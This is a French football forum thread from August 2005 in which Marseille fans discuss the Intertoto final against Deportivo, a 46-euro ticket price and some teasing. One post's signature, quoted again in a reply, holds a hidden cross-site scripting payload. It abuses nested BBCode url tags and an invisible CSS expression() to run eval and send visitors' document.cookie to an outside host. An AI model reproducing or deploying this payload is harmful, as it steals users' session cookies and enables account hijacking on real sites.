Actualité, matchs, Olympique de Marseille, Ligue 1, championnats étrangers et football en général, c'est ici que ça se passe !
05 Aoû 2005, 21:50
gob, munitis c'est une mobilette... face à nos défenseurs qui tirent la caravane en ce moment ça me fesait peur, surtout chez eux... la c'est déja ça de pris on va pas cracher dessus.
05 Aoû 2005, 22:16
C'est net !
Jodko.
05 Aoû 2005, 22:31
jod.ko, pas de marque stp
05 Aoû 2005, 22:37
Mais c'est toi le chiotte !
Jodko.
05 Aoû 2005, 22:42
jod.ko,
05 Aoû 2005, 22:46
WC net...
ET ui, j'ai l'esprit plus tordu et nettement plus fin que toi =)
Jodko.
05 Aoû 2005, 22:48
jod.ko, pwa j'immagine la gueule que doit avoir ton esprit alors
05 Aoû 2005, 22:49
*Massalia*, jod.ko C'est un g4m3r, il te met un hs, one shoot, t'es die copain :p
05 Aoû 2005, 22:50
LeNa, c'est le tiens en photo?
05 Aoû 2005, 22:52
LeNa, va alimenter ton topic Ca cogne, il risque de fermer dans pas longtemps
05 Aoû 2005, 22:52
LeNa, t'inquietes pas trop pour moi
05 Aoû 2005, 23:54
*Massalia* a écrit:LeNa, t'inquietes pas trop pour moi
mais si, au moins un peu allez !
05 Aoû 2005, 23:59
pandiani (celui qui avait marqué 3 buts au psg) a été vendu en angleterre, il ne jouera donc pas non plus contre nous meme si il est moins bon maintenat
06 Aoû 2005, 00:11
quelqu'un de avignon y va ? jsuis en galere vite aidez moi, baio ta pensez a ce que je t'ai dis tout à l'heure?
06 Aoû 2005, 08:09
*Massalia* a écrit:gob, munitis c'est une mobilette... face à nos défenseurs qui tirent la caravane en ce moment ça me fesait peur, surtout chez eux... la c'est déja ça de pris on va pas cracher dessus.
d'ailleurs la nouvelle chanson sui accompagnera les joueurs à leur entrée sur le vèl sera caravane de raphaél...
06 Aoû 2005, 09:35
Moi j'aurai bien été a l'aller mais 46E
rien que la place , ca refroidit tout de suite .
Ils peuvent se les carrer ou je pense leur places . C'est vrai que c'est une finale mais c'est l'intertoto .
06 Aoû 2005, 10:43
manuchao a écrit:Moi j'aurai bien été a l'aller mais 46E
Ils peuvent se les carrer ou je pense leur places . C'est vrai que c'est une finale mais c'est l'intertoto .
C simple,ils ne veulent pas se faire dominer dans les tribunes au Riazor
Je retiens cette phrase de Mourinho "c sur,il y aura une grosse ambiance (en parlant du Riazor) mais rien de comparable au velodrome et à old trafford"
06 Aoû 2005, 14:39
crikken a écrit:*Massalia* a écrit:gob, munitis c'est une mobilette... face à nos défenseurs qui tirent la caravane en ce moment ça me fesait peur, surtout chez eux... la c'est déja ça de pris on va pas cracher dessus.
d'ailleurs la nouvelle chanson sui accompagnera les joueurs à leur entrée sur le vèl sera caravane de raphaél...
Avec la joie qu'inspire cette chanson ça va donner
06 Aoû 2005, 14:57
manuchao a écrit:Moi j'aurai bien été a l'aller mais 46E
46€??
Ils se croient en Angleterre?
Purement scandaleux...
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://hotmail7.free.fr/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
06 Aoû 2005, 15:22
nms a écrit:manuchao a écrit:Moi j'aurai bien été a l'aller mais 46E
46€??
Ils se croient en Angleterre?
Purement scandaleux...
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://hotmail7.free.fr/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
Ils ont fait le meme prix pour les supporters de Newcastlle bien évidément aucun n'est descendu.
Ils font ça pour ne pas avoir de supporter extérieur a gérer, mais bon on sera la ba quand meme